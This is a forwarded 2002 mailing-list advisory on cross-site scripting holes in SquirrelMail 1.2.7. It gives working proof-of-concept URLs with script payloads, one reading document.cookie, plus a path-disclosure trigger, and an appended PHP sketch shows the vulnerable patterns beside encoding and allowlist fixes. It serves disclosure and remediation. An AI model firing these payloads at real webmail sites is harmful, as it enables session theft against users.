----- Original Message -----
From: "DarC KonQuesT" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Friday, September 20, 2002 12:14 AM
Subject: Squirrel Mail 1.2.7 XSS Exploit


> ****Sorry if you receive two of these.****
>
> DarC KonQuesT XSS Release-
>
> Product: Squirrel Mail 1.2.7 - released June 21, 2002 (tested, others
> possibly vulnerable)
> Vendor: Squirrel Mail - Web: www.squirrelmail.org
> Problem: Cross Site Scripting
> Severity: Moderate
> Operating System(s): Tested against Red Hat 7.3, all others vulnerable if
> they are using this version of Squirrel.
>
> Discovered: August 4, 2002
> Vendor Notified: um...now?
> Public Release: Now - September 10
>
> Background:
> Squirrel Mail is a webmail daemon that provides an HTTP mail interface
> using PHP.
>
> Release Notes:
>     I **DID NOT** notify the developers (until now) because I am a lazy
> SoB and my motivation is lacking (freelance, unpaid, bored guy). I kept
> putting it off (notice discovery date and the release now) and now they've
> released several newer versions (most recently 1.3.1), which I have not
> tested. Because of the release(S) of the new versions and due to my gross
> slothfulness, I've decided to do a direct public release. Also, for those
> of you who know PHP, you should be able to fix this problem without much
> trouble. Apologies to those who feel like they're getting screwed over by
> this.
>
> Problem:
>     User input is not sanitized so execution of arbitrary code on a client
> computer is possible through a Cross Site Scripting (XSS) hole while the
> code executes under the domain of the site which the webmail is hosted at.
> Similar holes exist in the following utilized scripts:
>     addressbook.php
>     options.php
>     search.php
>     help.php
>
> _MAIN_ Exploit:
>     The XSS hole I developed the most is in addressbook.php. I was able to
> inject and execute JavaScript code and after opening the addressbook page
> there was no indication that I had changed anything (after entering the
> HTML comment tags to get rid of some hanging code that my JavaScript had
> made text).
>
> The URL I crafted for the exploit is as follows:
>
> http://<VULNERABLE SITE>.net/webmail/src/addressbook.php?"><script>alert(document.cookie)</script><!--
>
> If you execute the code without the HTML comment tag on the end it leaves
> a nasty hanging bit of HTML code which is a clear indication that something
> has gone awry to many users (however some may ignore it as they don't
> understand it).
>
> _OTHER_ Holes:
>
> 1) This will reveal the path to the PHP directory and other...maybe
> interesting to someone, I didn't really care but decided to include it.
> The problem is in options.php.
>
> http://<VULNERABLE SITE>.net/webmail/src/options.php?optpage=<script>alert('boop!')</script>
>
> it returns the following on the page for the server I tested:
> Fatal error: Failed opening required ''
> (include_path='.:/php/includes:/usr/share/php') in
> /var/www/squirrelmail/src/options.php on line 172
>
> 2) This is a XSS hole in search.php:
>
> http://<VULNERABLE SITE>.net/webmail/src/search.php?mailbox=<script>alert('boop!')</script>&what=x&where=BODY&submit=Search
>
> 3) Another in search.php
>
> http://<VULNERABLE SITE>.net/webmail/src/search.php?mailbox=INBOX&what=x&where=<script>alert('boop!')</script>&submit=Search
>
> 4) XSS in help.php:
>
> http://<VULNERABLE SITE>.net/webmail/src/help.php?chapter=<script>alert('boop!')</script>
>
> 5) XSS in addressbook (different):
>     Manually entered nicks, email addresses, first names, last names, and
> info sections in the addressbook are not filtered so script can be placed
> and executed through them the next time the page is viewed.
>
> Vendor Action:
>     I didn't notify....yeah yeah I know....
>
> Aftermath:
>     It seems to me this has all the normal dangers of an XSS hole so
> listing them seems pointless (I'm sure we've all seen them). If someone
> expands this idea to include other/larger possibilities I'd be interested
> in hearing about it.
>
> FINAL UPDATE - 9/10/02 I found what I believe is the main developer or
> head guy's email address so I'm direct mailing him too. Maybe he can tell
> us if the newer versions are fixed.
>
> (---There was a section here about a quote from their page --Revision=
> Konstantin ("Icon") Riabitsev informed me that MagicHTML has nothing to do
> with this but with the protection of email viewed in HTML form...seriously
> helliphino I didn't bother to look it up.  Thanks for the correction.--)
>
> Later on, and have fun,
>
> - DarC KonQuesT -(DiR)-
>     Ringleader - DarC Horizons
>     United States of America
>
> Greets:
> DarCLinG, V3ga, st3v3, Jenn, Christina, John (heh, you're next)
>
> "Congress shall make no law abridging the freedom of sXXXch, or the right
> of the people peaceably to XXXemble, and to peXXXion the government for a
> redress of grievances." -- Marc Rotenberg
>
>
>
>
> ---
> Outgoing mail is certified Virus Free.
> Checked by AVG anti-virus system (http://www.grisoft.com).
> Version: 6.0.377 / Virus Database: 211 - Release Date: 7/15/02
>
>
>
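The two bug classes in the forwarded advisory, untrusted input echoed into HTML without encoding and a request parameter that decides which file options.php pulls in, reduced to a minimal PHP sketch with each vulnerable pattern beside its fix. This is an added illustration and not SquirrelMail's source: the parameter names and payloads are the advisory's, while the form markup, the optpage-to-file mapping and the page table are assumptions made for the example.

```php
<?php
// Added illustration, not SquirrelMail's code. The two bug classes from the advisory
// are reduced to minimal PHP, each pattern next to its fix. Parameter names and
// payloads are the advisory's; the markup, the optpage-to-file mapping and the
// page table are assumptions.

// ---- Reflected XSS: untrusted input echoed into HTML without encoding ----

// Vulnerable pattern (assumed): the raw request URI becomes a form action.
// The addressbook.php?"><script>alert(document.cookie)</script><!-- payload closes
// the attribute and the tag, injects the script, and its trailing <!-- comments out
// the dangling ' method="post">' so the rendered page shows no stray text.
function addressbook_form_vulnerable($request_uri)
{
    return '<form action="' . $request_uri . '" method="post">';
}

// Fixed: encode for the attribute context before concatenating. ENT_QUOTES escapes
// both " and ' (older PHP left ' alone by default, which still breaks out of
// single-quoted attributes).
function addressbook_form_fixed($request_uri)
{
    $safe = htmlspecialchars($request_uri, ENT_QUOTES, 'UTF-8');
    return '<form action="' . $safe . '" method="post">';
}

// The mailbox, where and chapter parameters, and the stored addressbook fields
// (nick, email, names, info), are reflected into element content. Encoding at
// output time covers both the reflected and the stored case.
function reflect_fixed($value)
{
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// ---- options.php: a request parameter selects the file to require() ----

// Vulnerable pattern (assumed): optpage feeds the path. A value that matches no
// file makes require() die with "Failed opening required ...", printing
// include_path and the script's filesystem path, as quoted in the advisory.
function optpage_file_vulnerable($optpage)
{
    return 'options_' . $optpage . '.php';   // caller does require() on this
}

// Fixed: the parameter is only a key into a fixed table (assumed contents).
// Unknown keys fall back to a default; the value never reaches the filesystem.
function optpage_file_fixed($optpage)
{
    $pages = array(
        'personal' => 'options_personal.php',
        'display'  => 'options_display.php',
        'folder'   => 'options_folder.php',
    );
    return isset($pages[$optpage]) ? $pages[$optpage] : $pages['personal'];
}

// ---- Run the advisory's payloads through both versions ----
$xss = '/webmail/src/addressbook.php?"><script>alert(document.cookie)</script><!--';
echo addressbook_form_vulnerable($xss), "\n";   // attribute and tag broken open
echo addressbook_form_fixed($xss), "\n";        // payload stays inside the quotes

$probe = "<script>alert('boop!')</script>";
echo reflect_fixed($probe), "\n";
echo optpage_file_vulnerable($probe), "\n";
echo optpage_file_fixed($probe), "\n";
```

The advisory's URLs double as the regression check: against an unpatched install the payload appears verbatim in the page source, after the fix it appears as entity-encoded text inside the attribute or element. The options.php leak is two problems, the unchecked parameter and the fact that the fatal error text reaches the browser at all; the allowlist handles the first, and turning display_errors off in production handles the second for every other script on the box.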

---
To unsubscribe, send mail to
[EMAIL PROTECTED] with the subject 'unsubscribe rlug'.
RULES, archives and other information: http://www.lug.ro/mlist/

